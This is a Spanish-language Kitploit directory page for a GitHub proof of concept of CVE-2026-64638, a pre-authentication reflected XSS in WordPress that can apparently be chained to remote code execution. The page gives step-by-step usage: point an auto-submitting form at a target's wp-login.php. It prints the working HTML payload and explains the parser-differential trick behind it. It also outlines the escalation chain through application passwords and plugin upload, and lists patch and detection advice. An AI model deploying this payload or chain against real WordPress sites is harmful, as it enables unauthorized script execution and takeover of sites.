Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-64638 — Prueba de concepto HTML de un solo archivo para XSS reflejado pre-autenticación en WordPress (CVE-2026-64638), que demuestra la ejecución de JavaScript no autenticado y una cadena XSS a RCE mediante DOM clobbering y carga de contraseñas de aplicación. | Kitploit
Herramientas/GitHubGitHub/4minx/cve-2026-64638
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónDesarrollo de Payloads
GitHub4minx/cve-2026-64638

CVE-2026-64638

Prueba de concepto HTML de un solo archivo para XSS reflejado pre-autenticación en WordPress (CVE-2026-64638), que demuestra la ejecución de JavaScript no autenticado y una cadena XSS a RCE mediante DOM clobbering y carga de contraseñas de aplicación.

Ver Repositorio
1hace 13 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC de Alerta XSS2Shell (CVE-2026-64638)

Prueba de concepto de XSS reflejado sin autenticación previa en WordPress

Prueba de concepto en un único archivo HTML para el CVE-2026-64638 (XSS2Shell), un XSS diferencial de analizador en el núcleo de WordPress. Demuestra la ejecución de JavaScript sin autenticación en el origen de WordPress mediante una solicitud de inicio de sesión manipulada.


Información de la vulnerabilidad

  • CVE: CVE-2026-64638 (XSS2Shell)
  • Tipo: XSS reflejado sin autenticación previa (diferencia de analizador: strip_tags() vs wp_kses_post())
  • Escalada: Puede encadenarse hasta RCE (DOM clobbering → REST JSONP → SOME → Application Password → subida de plugins)
  • Afectados: WordPress 6.4 – 7.0.2 (rango prácticamente explotable)
  • Corregido: WordPress 7.0.3 (retroportado a las ramas con soporte hasta 4.7)

Uso

  1. Abre POC.html en un editor de texto.
  2. Reemplaza http://TARGET/wp-login.php en la action del formulario por tu objetivo.
root@kitploit:~
<form id="poc" method="post" action="http://TARGET/wp-login.php">
  1. Abre el archivo en un navegador. El formulario se envía automáticamente; si el objetivo es vulnerable, aparecerá un diálogo confirm() (o alert()) en el origen de WordPress.

Payload del PoC

root@kitploit:~
< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=confirm&_envelope=1>
< div id=color-picker class=reset-pass-submit>
< button class="wp-generate-pw color-option">X

El espacio después de cada < es el exploit. Sin él, wp_strip_all_tags() lo elimina todo.


Requisitos

  • Una instalación de WordPress vulnerable (6.4 – 7.0.2, sin parchear)
  • Un navegador con JavaScript habilitado
  • Sin dependencias de herramientas (HTML puro)

Detección / Mitigación

  • Actualiza a WordPress 7.0.3 o a una rama parcheada.
  • Revoca/rota todas las Application Passwords existentes después de parchear.
  • Bloquea los patrones de %3C + espacio en blanco en el campo log en el WAF/borde.
  • Supervisa las solicitudes POST /wp-login.php donde log contenga < codificado.

Referencias

  • pwn.ai — XSS2Shell: cadena de XSS preauth a RCE en WordPress
  • Lanzamiento de WordPress 7.0.3
  • Hadrian — análisis de CVE-2026-64638
  • IONSEC — análisis técnico de XSS2Shell
Descargar herramienta